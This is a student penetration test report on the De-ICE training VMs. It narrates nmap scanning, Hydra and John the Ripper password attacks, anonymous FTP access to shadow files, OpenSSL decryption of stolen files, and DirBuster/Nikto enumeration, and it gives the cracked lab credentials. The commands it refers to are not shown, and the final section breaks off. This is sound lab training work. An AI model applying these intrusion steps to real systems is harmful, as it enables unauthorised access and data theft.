Final Penetration
Test Report
12/17/2012
Final Penetration test report for De-ICE v1.0,1.1, and 2.0
Network Security
Analysis
Caleb Walter 12/17/2012
1
Unit 4 – Information Gathering
All penetration tests were done using Backtrack 5 R3 within a virtualized environment, with
each OS encompassed in its own VM and isolated from outside the virtual switch.
De-ICE v1.100
To begin the penetration test of the first disk of the De-ICE collection, an enumerated nmap
Group E Security Analysis
scan detailing any open ports and their running services, as well as the operating system,
was run on its automatically assigned IPv4 address. Initially pinging the disk proved
unsuccessfully as it was absorbing or rejected any ICMP packets. Once the nmap scan was
completed, numerous opened ports were found along with their service and version. These
services, which provide numerous common attack vectors, included FTP, SSH, SMTP, and
HTTP among others, are to be the next step in the investigation.
Seeing that the disk was open on port 80 and running an Apache server, a quick trip over to
the IP to see what their website held was in order. Upon navigation to the running website,
2
it was found that employee emails, especially those of the IT department, were publicly
posted to give an avenue of communication for any questions or concerns. These were
Caleb Walter, calwalte@uat.edu
recorded, minus the “@herot.net” section as well as reverse the order of name and initial,
for potential SSH and FTP usernames.
The first attack vector to be investigated was the SSH service, as the FTP service appeared to
be broken or at least misconfigured according to the initial nmap scans. Using the newly
created list of possible usernames, Hydra was run, using the command below, to attempt to
log into the SSH server and provide the credentials used.
This command instructs Hydra to use the file “PossibleUsernames” for its login username
credential, to use the word “password” or the username itself as as the log in password, and
to target the ssh service running on 192.168.1.100. After a few minutes, the Hydra run
completed successfully and an accepted username and password was found, bbanter and
3
Unit 4 – Information Gathering
bbanter respectively. This was confirmed with a successful SSH login into the service, which
Group E Security Analysis
granted us all of bbanter’s access to the box.
Once access was granted directly into the target machine, the first destination was to the
“/etc” directory where both the shadow and core files are kept. These files will house all of
the systems created users and potentially hashes of their passwords. Unfortunately, the
latter was not the case here, but the “aadams” username was confirmed by the system and
appeared in the root users group.
With the knowledge that aadams and ccoffee are both confirmed usernames on our system,
another Hydra attack was running using the same parameters as before, only replacing the –
P password command with a substituted wordlist to attempt a dictionary style attack on the
service. Just as before, a successful attack was performed and a username and password
4
were found, aadams and nostradamus respectively. Also, as previously done, a successful
login to the target system via SSH confirmed this. The shadow file within the system now
Caleb Walter, calwalte@uat.edu
was fully revealed, as aadams is a root level user, and provided full password hashes for
each other account.
Now that the full hashes, as well as the digest used to encrypt them was revealed, the next
logical step was to attempt to crack these hashes in order to retrieve their actual passwords.
This was done using John the Ripper, with the hashes in their own private file as well as the
same wordlist collection as used in the previous Hydra attacks. This revealed the root
accounts password to be the word “tarot”. This was confirmed by activating super user
within an SSH session as aadams on the target system, activating and initializing the root
account, giving full unrestricted access to the box.
5
Unit 4 – Information Gathering
With this new found access, a little directory navigation was in order, to either find some
interesting information itself or a way to access said information, perhaps with the FTP
server from earlier. After a short while, a rather interesting file entitled salary_dec2003 was
found within the ftp server’s incoming folder. This file assumingly hold the salary and pay
information for some, if not all, employees within the company and perhaps even some
Group E Security Analysis
sensitive financial information regarding said employees.
Unfortunately, this file had a “.enc” file extension, meaning that it was UUencoded before
being saved, and must be decoded to prove of any use. This was achieved using the
OpenSSL program which found the file to be in 128bit AES encryption, and could be
decrypted fairly easily. This was done with the following command;
This command invokes and instructs OpenSSL to decrypt the file, which is in 128bit aes,
6
rename the file and output it, and gave it root permission to do so. With this newly created
and decrypted .csv file, the only stumbling block now was how to get it off the box. As seen
Caleb Walter, calwalte@uat.edu
earlier in the nmap scan, there was indeed an ftp server running, however, it was either
broken, deactivated, or misconfigured. This can be further explored within the FTP servers
config file, vsftpd.conf. Upon reviewing this file, it was found that vsftpd was not running,
and was not configured to run in standalone mode, as opposed to inetd. This change was
made, a simple uncomment of an option, and the ftp server was back up and running.
Connecting to the FTP server, using the root username and password as retrieved from
earlier, was then a mere trivial command. Once successfully logged into the FTP server, the
decrypted and renamed December 2003 salary details was pulled down and downloaded
onto the attacking system.
7
Unit 4 – Information Gathering
Group E Security Analysis
De-ICE V1.110
Just as before, the first action taken in this penetration test is the running of a Service and
Operating System enumerated Nmap scan on the ip of the target system, 192.168.1.110.
The results of this scan showed that there were several open ports on the system, including
multiple from the previous test, such as FTP, SSH, and HTTP. There was also an addition port
open for a CUPS service, which is a printing and print spooling service for *nix systems.
8
Caleb Walter, calwalte@uat.edu
The first attack vector that will be explored in this test is the FTP server, as unlike the
previous test, this server was showing full functionality and the SSH service is showing
questionable results. A common misconfiguration or setting left on for many FTP servers is
that they allow anonymous access to the files stored within and sometimes the wrong files
get stored in the wrong places. Attempting to log on to the FTP server using the username
“anonymous” and a blank password resulted in a successful login. After a quick sift through
the available directories available, it was found that both the Core and the Shadow files are
available to be freely downloaded, which potentially contain all of the usernames and
password hashes of the users on the system.
Once the core and shadow files were successfully downloaded from the FTP server, a quick
9
“strings” command ran against the core file showed every string data type within the core
Unit 4 – Information Gathering
file, including usernames for bbanter, aadams, ccoffee, and root, along with password
Group E Security Analysis
hashes for each one.
These usernames and password hashes were separated out and put into a new text file
entitled “Shadow”, so that it could be the specific target of a standard password attack. John
the Ripper was once again employed for this task, using the same wordlists as the previous
test and run against the “/root/Shadow” file to attempt to crack the hashes. After a few
short minutes, John came up with two successfully cracked hashes, the root account and
CCoffee’s account.
Now that two usernames and passwords were successfully acquired, it was time to
investigate the SSH service and see about getting a root level remote shell on the target. A
10
standard SSH login request was made of the target, using ccoffee’s credentials. Once this log
Caleb Walter, calwalte@uat.edu
in was successful, the next step was the immediate escalation of privileges to the super user
account.
Directory investigation and enumeration was now underway with the root account and an
interesting discovery was made within the “/home/root/.save” directory, an excel
spreadsheet entitled “customer_accounts”. However, just as before, this file was
Uuencoded, and needed to be decrypted, and renamed to be of any use. This was done just
as before, using Openssl and the following command;
This command invokes and instructs OpenSSL to decode the input file with 256bit AES
digest, detect and remove any slat within the encryption, and output the file in its pure .csv
format. This command also provides Openssl with a passfile to check against the encoded
file.
After this file was successfully decoded, it was simply a matter of running a cat command
against it to reveal its contents without opening it within Excel.
11
Unit 4 – Information Gathering
Group E Security Analysis
De-ICE v2.100
As what has become almost tradition with these tests, the first step in this penetration test
was to run an Service Detection and Operating System scan against the target system. This
time, however, was a little different in that Nmap detected the presence of 2 separate IPs in
the IP range, 192.168.2.100 and 192.168.2.101.
12
Caleb Walter, calwalte@uat.edu
On the .100 target, FTP and SSH once again appeared, as well as HTTP,SMTP and related
open mail service ports. The .101 machine was a little less forthcoming, only showing an
Apache Server running on port 80. After observing that both of these machines were
running an Apache server, navigation to their respective IPs through a web browser was the
next step. The .100 box revealed a large amount of potential usernames in the form of
company emails, appearing to be last names only. The emails were all distilled down to their
last names and saved into a text file for future investigation. The .101 box seemed rather
innocuous, excepting the fact that it contained an FTP/SVN like file sharing structure., which
is often times misconfigured or misappropriated with files from unwitting employees with
access. Checking for valid directories within this SVN structure was the next valid step in the
process, which was done using the DirBuster tool from OWASP, which attempts to
enumerate a websites file structure and architecture through a dictionary like attack against
the website itself. The “wordlist” for this attack was the set of potential usernames garnered
from the .100 box earlier with a tilde (~) prepended to each to represent a directory.
13
Unit 4 – Information Gathering
It was found that a ~root, ~havisham,~magwitch, and ~pirrip directory existed within the
website. A full web server scan was then initiated against the .101 boxing using Nikto, the
host being the target box and ~pirrip/ as the target directory. After the scan finished, it
appeared that that along with the ~pirrip directory there was also a ~pirrip/.ssh directory as
Group E Security Analysis
well, and this redirected to a location within the website.
After this was discovered, the next attack vector was the mail server on the .100 box, which
I figured I might be able to access and investigate some of the emails.
14
Caleb Walter, calwalte@uat.edu